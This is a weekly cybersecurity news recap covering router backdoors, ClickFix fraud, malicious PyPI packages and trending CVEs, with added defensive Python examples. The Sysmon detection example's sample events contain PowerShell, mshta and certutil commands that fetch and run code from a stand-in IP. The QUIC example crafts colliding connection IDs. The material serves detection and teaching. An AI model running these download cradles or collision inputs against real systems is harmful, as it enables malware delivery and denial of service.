
SunsetHost THN Weekly Recap: Major Router Exploits, Rising PyPI Package Attacks, Release of New Ransomware Decryptor, Critical Vulnerabilities in SCADA Systems, Advanced Threat Actor Techniques, and More Cybersecurity Updates

SunsetHost Weekly Tech News

This week in cybersecurity, the landscape continues to evolve at a rapid pace. From sophisticated nation-state campaigns to malware hiding in plain sight, the week's news is a reminder that attackers are constantly adapting. Advanced threat groups are targeting outdated hardware, leveraging legitimate tools for financial fraud, and finding increasingly creative ways to bypass security measures. Supply chain threats are on the rise, with open-source repositories being exploited for credential theft and hidden backdoors.

On a more positive note, law enforcement is ramping up efforts against cybercriminal networks, with key ransomware figures facing extradition and the cybersecurity community making strides in uncovering and dismantling active threats. Ethical hackers remain at the forefront of exposing critical vulnerabilities, and new decryptors are providing victims with a glimmer of hope against ransomware operators.

In this week’s recap, we cover the latest attack methods, emerging vulnerabilities, and defensive strategies that will help you stay one step ahead. Stay informed, stay secure.


Threat of the Week
UNC3886 Targets End-of-Life Juniper Networks MX Series Routers
The China-linked hacking group UNC3886 has deployed six distinct TinyShell-based backdoors on end-of-life Juniper Networks MX Series routers; fewer than 10 organizations are known to have been affected. The backdoors have differing custom capabilities, some active and some passive, and ship with scripts that disable logging on the compromised device. Juniper Networks has confirmed that CVE-2025-21590, an improper-isolation flaw in the Junos OS kernel, was exploited to bypass the operating system's code-integrity protection (Veriexec) and execute the malicious code. The flaw is only reachable by an attacker who already holds privileged access to the router, so credential hygiene and management-plane isolation matter as much as the patch, and devices past end of life should be replaced rather than left in place.



Top News

Storm-1865 Uses ClickFix for Financial Fraud and Theft
Storm-1865, a well-known threat actor, has been observed using the ClickFix technique in a campaign of Booking.com-themed lures that deliver credential-stealing malware. ClickFix tricks the victim into "fixing" a fake error or completing a fake verification step by copying a command the page supplies and pasting it into the Windows Run dialog, so the payload is launched by the user's own hands rather than by an exploit. Active since December 2024, the campaign spans North America, Oceania, Southeast Asia, and Europe.

North Korea Targets Korean and English-Speaking Users with KoSpy
The North Korea-linked ScarCruft group has uploaded fraudulent Android apps to the Google Play Store. These seemingly harmless utilities, when installed, deploy the KoSpy malware, which can collect SMS messages, call logs, location data, files, audio, and screenshots. The malware’s earliest versions date back to March 2022, though the scale of the campaign remains unclear.

SideWinder Targets Maritime and Logistics Companies
The APT group SideWinder has been linked to attacks on maritime and logistics companies across South and Southeast Asia, the Middle East, and Africa. The group utilizes the StealerBot toolkit to extract sensitive data from compromised hosts.

LockBit Developer Extradited to the U.S.
Rostislav Panev, a dual Russian-Israeli national, has been extradited from Israel to face charges related to his involvement as a developer for the LockBit ransomware group. Panev allegedly earned around $230,000 between 2022 and 2024 before his arrest in August 2024.

Malicious PyPI Packages Conduct Credential Theft
A set of 20 malicious packages on the Python Package Index (PyPI) masqueraded as time- and cloud-related utilities but contained hidden functionality to steal sensitive data, including cloud access tokens. The packages were downloaded over 14,100 times before being removed; three of them had been pulled in as dependencies of a popular GitHub project, a reminder that transitive dependencies need the same scrutiny as direct ones.
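A pre-install audit of a requirements file, as an added example that is not code from the original recap or from PyPI. It checks the two controls that blunt this class of package: exact pins with `--hash` entries, so `pip install --require-hashes` rejects any artefact other than the one you reviewed, and a lookalike check against a short watchlist of popular names. The watchlist, the requirements text and the sha256 value are constructed for the example.

```python
"""Added example: audit a requirements.txt for pinning, hash verification and
lookalike names. The POPULAR watchlist and SAMPLE_REQUIREMENTS are constructed."""
import re

# Constructed watchlist: names an attacker would plausibly imitate.
POPULAR = sorted({"requests", "boto3", "botocore", "python-dateutil", "pytz",
                  "google-cloud-storage", "azure-identity"})

REQ_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:==\s*([^\s\\#]+))?")
HASH_RE = re.compile(r"--hash=([A-Za-z0-9_]+):([0-9a-fA-F]+)")


def normalize(name):
    """PEP 503 normalisation so 'Python_DateUtil' and 'python-dateutil' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Edit distance; a small non-zero value between two names suggests a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def logical_lines(text):
    """Join pip's backslash continuations and drop comments and blank lines."""
    out, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        out.append(buf + line)
        buf = ""
    if buf:
        out.append(buf.rstrip())
    return out


def audit_requirements(text, max_distance=2):
    """Return [(name, [issues])]; an empty issue list means the entry passed."""
    findings = []
    for line in logical_lines(text):
        m = REQ_RE.match(line)
        if not m:
            continue
        name, version = m.group(1), m.group(2)
        issues = []
        if version is None:
            issues.append("unpinned")          # resolves to whatever is newest at install time
        if not HASH_RE.search(line):
            issues.append("no-hash")           # nothing verifies the downloaded artefact
        norm = normalize(name)
        if norm not in POPULAR:
            for known in POPULAR:
                if 0 < levenshtein(norm, known) <= max_distance:
                    issues.append(f"lookalike:{known}")
                    break
        findings.append((name, issues))
    return findings


# Constructed requirements text; the sha256 value is illustrative, not a real digest.
SAMPLE_REQUIREMENTS = """
requests==2.32.3 \\
    --hash=sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
boto3                      # floating version
pytz-utils==1.0.0          # pinned, but the artefact is unverified
python-dateutils==2.9.0    # one letter away from python-dateutil
"""

if __name__ == "__main__":
    for name, issues in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{name:20} {'OK' if not issues else ', '.join(issues)}")
```

Run it against a real requirements file and treat every `lookalike:` hit as a manual review item; the edit-distance check is a heuristic and will also flag legitimate forks, so it belongs in CI as a warning gate, not an automatic block.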


Trending CVEs
Software vulnerabilities remain a favored entry point for attackers, and this week’s list highlights critical flaws you should prioritize. Delaying patching can turn a minor vulnerability into a major breach, so stay on top of these critical updates.

This week’s critical vulnerabilities include:

  • CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26633 (Microsoft Windows)
  • CVE-2025-24201 (Apple iOS, iPadOS, macOS Sequoia, Safari, and VisionOS)
  • CVE-2025-25291, CVE-2025-25292 (ruby-saml)
  • CVE-2025-27363 (FreeType)
  • CVE-2024-12297 (Moxa PT switches)
  • CVE-2025-27816 (Arctera InfoScale)
  • CVE-2025-24813 (Apache Tomcat)
  • CVE-2025-27636 (Apache Camel)
  • CVE-2025-27017 (Apache NiFi)
  • CVE-2024-56336 (Siemens SINAMICS S200)
  • CVE-2024-13871, CVE-2024-13872 (Bitdefender BOX v1)
  • CVE-2025-20115 (Cisco IOS XR)
  • CVE-2025-27593 (SICK DL100-2xxxxxxx)
  • CVE-2025-27407 (graphql-ruby)
  • CVE-2024-54085 (AMI MegaRAC BMC firmware)
  • CVE-2025-27509 (Fleet)
  • CVE-2024-57040 (TP-Link TL-WR845N router)

Stay proactive with your patching to avoid the fallout from these vulnerabilities.

Around the Cyber World

Google Pays $11.8 Million in 2024 Bug Bounty Program
In 2024, Google awarded nearly $12 million to 660 security researchers who uncovered vulnerabilities through its Vulnerability Reward Program (VRP). A significant portion of this amount—over $3.3 million—was given to those who discovered critical flaws in Android and Google mobile applications. The company also highlighted that researchers submitted 185 bug reports related to its AI products, with rewards totaling over $140,000.

Security Flaws in ICONICS Suite Disclosed
Five high-severity vulnerabilities have been revealed in ICONICS Suite, a Supervisory Control and Data Acquisition (SCADA) system. The flaws—CVE-2024-1182, CVE-2024-7587, CVE-2024-8299, CVE-2024-9852, and CVE-2024-8300—could allow authenticated attackers to execute arbitrary code, escalate privileges, and manipulate vital files. If exploited in an industrial setting, these vulnerabilities pose serious risks to the confidentiality, integrity, and availability of the affected systems.

Threat Actors Intensify Abuse of Remote Access Tools
Cybercriminals, including groups such as TA583, TA2725, and UAC-0050, are increasingly misusing legitimate remote monitoring and management (RMM) tools like ScreenConnect, Fleetdeck, and Atera to execute attacks. These tools, often used for legitimate purposes, can be weaponized to collect data, facilitate financial theft, and deploy additional malware such as ransomware. The use of such tools evades traditional defenses, making detection more challenging.

Decryptor for Linux Variant of Akira Ransomware Released
A decryptor has been made available for the Linux/ESXi variant of Akira ransomware. The tool, created by researcher Yohanes Nugroho, exploits the fact that this variant derives its encryption keys from nanosecond-resolution timestamps taken during encryption, and uses GPU power to brute-force those keys and unlock files, giving victims a free way to recover their data.

Volt Typhoon Hackers Dwelled in a U.S. Electric Company for Over 300 Days
Chinese hackers linked to the Volt Typhoon campaign maintained a presence in a Massachusetts utility company’s systems for nearly a year. The attackers gained access via a vulnerable Fortinet 300D firewall associated with a managed service provider. Despite evidence of lateral movement and data exfiltration, the utility company reports that no sensitive customer data was compromised, and it successfully revamped its network architecture to thwart further attacks.

Lazarus Group Drops LazarLoader Malware
The North Korean-linked Lazarus Group has been observed targeting South Korean web servers to deploy LazarLoader, a malware downloader. This malware is used to install a backdoor that allows attackers to further compromise systems.

YouTube Becomes Conduit for DCRat
Cybercriminals are using YouTube to distribute Dark Crystal RAT (DCRat) malware. By uploading videos that promote gaming cheats and tools, attackers trick users into clicking malicious links in video descriptions. The malware, which has been active since 2018, offers functions like keystroke logging, webcam access, and password exfiltration.

New Social Engineering Campaigns Target Microsoft 365 Account Takeover
Two ongoing campaigns have been targeting Microsoft 365 users with advanced social engineering tactics. By leveraging OAuth redirection and brand impersonation, these campaigns aim to steal credentials and install malware. Three malicious OAuth apps—posing as Adobe Drive, Adobe Acrobat, and DocuSign—have been discovered redirecting users to phishing pages.

Wi-Fi Jamming Technique Enables Precision DoS Attack
A new research breakthrough reveals a sophisticated Wi-Fi jamming technique that can disrupt specific devices with millimeter-level precision. Using Reconfigurable Intelligent Surface (RIS) technology, attackers can manipulate wireless signals to block communications with targeted devices while leaving others unaffected.

Hash DoS Flaw in QUIC Implementations
Several Quick UDP Internet Connections (QUIC) protocol implementations are vulnerable to a hash-based Denial of Service (DoS) attack. Because a QUIC client chooses its own connection IDs, an attacker can craft IDs that collide in the server's connection-ID lookup table when that table uses a predictable hash, turning constant-time lookups into long chain walks and forcing the server to burn CPU on every packet.
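A toy model of the collision attack and its fix, as an added example that is not code from any QUIC stack. A server maps connection ID to connection state; if bucket placement is a public function of the ID bytes, a client can mint IDs that all land in one bucket. The byte-sum hash below is a stand-in for any unkeyed hash, and the fix is a per-process secret key (BLAKE2b keyed mode here; SipHash is what most real implementations use). Bucket count, ID length and the probe counter are choices made for the example.

```python
"""Added example: unkeyed vs keyed hashing of attacker-chosen connection IDs.
The table, hash functions and ID generator are constructed for illustration."""
import hashlib
import os

N_BUCKETS = 1024


def weak_hash(cid: bytes) -> int:
    # Unkeyed and trivially predictable: anyone can precompute collisions.
    return sum(cid)


_SECRET = os.urandom(16)  # fresh per process, never sent to peers


def keyed_hash(cid: bytes) -> int:
    # Bucket placement now depends on a secret the client cannot learn.
    digest = hashlib.blake2b(cid, key=_SECRET, digest_size=8).digest()
    return int.from_bytes(digest, "big")


class CidTable:
    """Chained hash table with a probe counter so the cost is measurable."""

    def __init__(self, hash_fn, n_buckets=N_BUCKETS):
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(n_buckets)]
        self.probes = 0

    def _bucket(self, cid):
        return self.buckets[self.hash_fn(cid) % len(self.buckets)]

    def insert(self, cid, state):
        bucket = self._bucket(cid)
        for i, (key, _) in enumerate(bucket):
            self.probes += 1
            if key == cid:
                bucket[i] = (cid, state)
                return
        bucket.append((cid, state))

    def lookup(self, cid):
        for key, state in self._bucket(cid):
            self.probes += 1
            if key == cid:
                return state
        return None

    def longest_chain(self):
        return max(len(b) for b in self.buckets)


def craft_colliding_cids(n):
    """n distinct 8-byte IDs whose byte sums are all 4 * 255, so weak_hash collides."""
    cids = []
    for i in range(n):
        head = i.to_bytes(4, "big")
        cids.append(head + bytes(255 - b for b in head))
    return cids


def measure(hash_fn, n=2048):
    """Insert n crafted IDs, look each up; return (longest chain, avg probes per lookup)."""
    table = CidTable(hash_fn)
    cids = craft_colliding_cids(n)
    for i, cid in enumerate(cids):
        table.insert(cid, f"conn-{i}")
    table.probes = 0
    for cid in cids:
        assert table.lookup(cid) is not None
    return table.longest_chain(), table.probes / n


if __name__ == "__main__":
    for name, fn in (("unkeyed byte-sum", weak_hash), ("keyed BLAKE2b", keyed_hash)):
        chain, avg = measure(fn)
        print(f"{name:18} longest chain={chain:5d}  avg probes per lookup={avg:.1f}")
```

With the unkeyed hash every crafted ID shares one bucket, so the average lookup walks half the table; with the keyed hash the same IDs spread out as if they were random. The same reasoning applies to any server-side table keyed by client-supplied bytes, not just QUIC connection IDs.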

Exposed Jupyter Notebooks Become Cryptominer Targets
New attacks have been targeting misconfigured Jupyter Notebook servers on both Windows and Linux systems, deploying cryptocurrency miners. The attackers abuse instances exposed to the internet with weak or missing authentication to run code on the host and install mining software aimed at Monero and other lesser-known cryptocurrencies.

ESP32 Chip Backdoor Claims Disputed
Espressif, the manufacturer of the ESP32 microcontroller, has disputed claims of a backdoor in its products. Researchers initially discovered undocumented commands in the chips that could potentially be exploited in supply chain attacks. Espressif clarified that these commands are for internal debugging purposes and will release a software fix to address the issue.

Switzerland Makes it Mandatory to Disclose Critical Infra Attacks
Starting April 1, 2025, critical infrastructure organizations in Switzerland will be required to report cyberattacks to the National Cyber Security Centre (NCSC) within 24 hours. Failure to report attacks could result in fines. This mandate includes incidents threatening the functionality of critical infrastructure or involving data manipulation, blackmail, or coercion.

Bugs in Microsoft’s Time Travel Debugging (TTD) Framework
Mandiant has identified security flaws in Microsoft’s Time Travel Debugging (TTD) framework, a tool used for debugging Windows user-mode applications. These flaws could allow attackers to bypass security analysis and go undetected, masking vulnerabilities that could be exploited. Microsoft has addressed the issues in TTD version 1.11.410.

NIST Chooses HQC as Fifth Post-Quantum Crypto Algorithm
NIST has selected HQC (Hamming Quasi-Cyclic) as a backup key-encapsulation algorithm to counter the potential future threats posed by quantum computers. ML-KEM remains the primary standard; HQC is code-based rather than lattice-based, so it provides a second line of defense that does not fall with ML-KEM should lattice cryptanalysis advance.

Going from BYOVD to BYOTB to BYOVE
The Bring Your Own Vulnerable Driver (BYOVD) technique, in which attackers load a legitimate but vulnerable signed driver to gain kernel-level code execution, disable security tooling, and elevate privileges, continues to evolve. Research has introduced variations on the idea, including Bring Your Own Trusted Binary (BYOTB) and Bring Your Own Vulnerable Enclave (BYOVE), which abuse trusted binaries and secure enclaves respectively to evade detection and execute payloads stealthily.

Cybersecurity Webinars

Learn How to Eliminate Identity-Based Threats
Traditional security methods are increasingly ineffective against identity-based threats like phishing and MFA bypass. This webinar will discuss secure-by-design access solutions that offer phishing resistance, device compliance, and adaptive authentication, shifting security strategies from reactive to proactive.

Discover AI-Driven Threats and Zero Trust Defense Before It’s Too Late
Join Diana Shtil from Zscaler to explore how AI is reshaping cybersecurity and learn proactive strategies—including Zero Trust defense—to protect your organization from AI-driven attacks.

Your AI is Outpacing Your Security: Here’s How to Keep Up
Hidden AI tools are quietly spreading across environments, bypassing traditional security controls. Join Dvir Sasson, Director of Security Research at Reco, to uncover how to detect and respond to stealthy AI threats in your SaaS applications.

Cybersecurity Tools

CVE Prioritizer
Streamline vulnerability management with this advanced tool that integrates CVSS scores, EPSS predictive insights, CISA KEV, and VulnCheck’s enriched community data. It helps prioritize vulnerabilities that are most likely to be actively exploited, making patch management more efficient.

Fleet
Fleet is an open-source IT and security platform that simplifies vulnerability tracking, device health monitoring, and security policy management across macOS, Windows, Linux, cloud platforms, and IoT. It offers a modular, lightweight solution that integrates smoothly with other tools.

ZeroProbe
ZeroProbe is a specialized toolkit for security researchers and red teamers, designed for precise detection of kernel exploits, DLL hijacking, privilege escalation, and suspicious memory regions. It allows for stealthy, forensic-friendly assessments on Windows systems.

Tip of the Week

Detecting Threat Actors Early with Sysmon and Event ID 4688
Windows Security Event ID 4688 (Process Creation) is built into every Windows host, but it records nothing useful until you enable the "Audit Process Creation" policy and turn on "Include command line in process creation events". Sysmon's Event ID 1 records the same launches with the parent image, file hashes, and signing details, and other Sysmon events add file creation, registry changes, and network connections. Together they let you spot suspicious process chains early, such as explorer.exe or an Office application launching an encoded PowerShell command. Deploy Sysmon with a vetted configuration, forward both channels to a SIEM (free options exist), and alert on parent-child relationships and command-line content rather than on binary names alone.
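Detection rules over the process-creation telemetry this tip recommends, as an added example that is not code from the original recap. It targets the patterns elsewhere in this issue: the ClickFix Run-dialog launches of the Storm-1865 campaign, encoded PowerShell cradles, Office-spawned interpreters, and the unsanctioned RMM agents described in the remote-access-tools item. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine) with a fallback to the 4688 names (NewProcessName, ParentProcessName). The JSON records, IP addresses and RMM agent file names are constructed; the RMM list is a placeholder to replace with the agents your estate actually sanctions.

```python
"""Added example: process-creation detection rules. SAMPLE_EVENTS, the RMM
agent file names and the IP addresses are constructed for illustration."""
import base64
import json
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Hypothetical binary names: check the real file names your RMM vendors ship.
RMM_AGENTS = {"screenconnect.client.exe", "ateraagent.exe", "fleetdeck_agent.exe"}

CRADLE_RE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b|"
    r"frombase64string|\bcurl\b|\bwget\b|\bcertutil\b)", re.I)
URL_RE = re.compile(r"https?://", re.I)
HIDDEN_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-noni\b)", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the rule names an event triggers; an empty list means nothing flagged."""
    image = basename(event.get("Image") or event.get("NewProcessName") or "")
    parent = basename(event.get("ParentImage") or event.get("ParentProcessName") or "")
    cmd = event.get("CommandLine") or ""
    hits = []

    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded_powershell")
    payload = decoded if decoded is not None else cmd   # inspect the decoded text when present
    if CRADLE_RE.search(payload):
        hits.append("download_cradle")

    # ClickFix: the victim pastes a command into Win+R, so the interpreter's
    # parent is explorer.exe and the arguments carry a URL, hidden window or payload.
    if parent == "explorer.exe" and image in INTERPRETERS and (
            decoded is not None or URL_RE.search(payload)
            or HIDDEN_RE.search(cmd) or CRADLE_RE.search(payload)):
        hits.append("clickfix_run_dialog")

    if parent in OFFICE_APPS and image in INTERPRETERS:
        hits.append("office_spawned_interpreter")

    if image in RMM_AGENTS:
        hits.append("rmm_agent_present")
    return hits


def scan(jsonl):
    """Scan newline-delimited JSON records; return [(RecordId, hits)] for flagged events."""
    out = []
    for line in jsonl.splitlines():
        if line.strip():
            event = json.loads(line)
            hits = evaluate(event)
            if hits:
                out.append((event.get("RecordId"), hits))
    return out


def _b64_utf16(s):
    return base64.b64encode(s.encode("utf-16le")).decode()


# Constructed sample records; 198.51.100.0/24 is a documentation address range.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},                       # user opened a console: benign
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc "
                    + _b64_utf16("iex (iwr 'http://198.51.100.7/v.ps1')")},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://198.51.100.7/captcha.hta"},
    {"RecordId": 4, "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.Client.exe",
     "CommandLine": "ScreenConnect.Client.exe"},
    {"RecordId": 5, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe"},
])

if __name__ == "__main__":
    for record_id, hits in scan(SAMPLE_EVENTS):
        print(record_id, ", ".join(hits))
```

The first record, a user opening PowerShell from the Start menu, is deliberately not flagged: the rule fires on explorer.exe as parent only when the arguments also carry a URL, a hidden-window switch or an encoded payload, which is what separates a pasted ClickFix command from ordinary use. Tune the RMM rule to alert on agents that are not on your allowlist rather than on every RMM binary, or it will drown the analysts it is meant to help.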

Conclusion

The threat landscape continues to evolve at a rapid pace, with attackers leveraging new tactics, tools, and technologies to bypass security defenses. As organizations face increasingly sophisticated attacks, it's critical to stay ahead of the curve by continuously adapting and fortifying defenses. Proactive strategies, a deeper understanding of attacker behavior, and staying informed about emerging threats are essential for maintaining robust security. Keep monitoring the shifting landscape, and remember: the best defense is always a step ahead. Stay proactive, stay skeptical, and stay secure.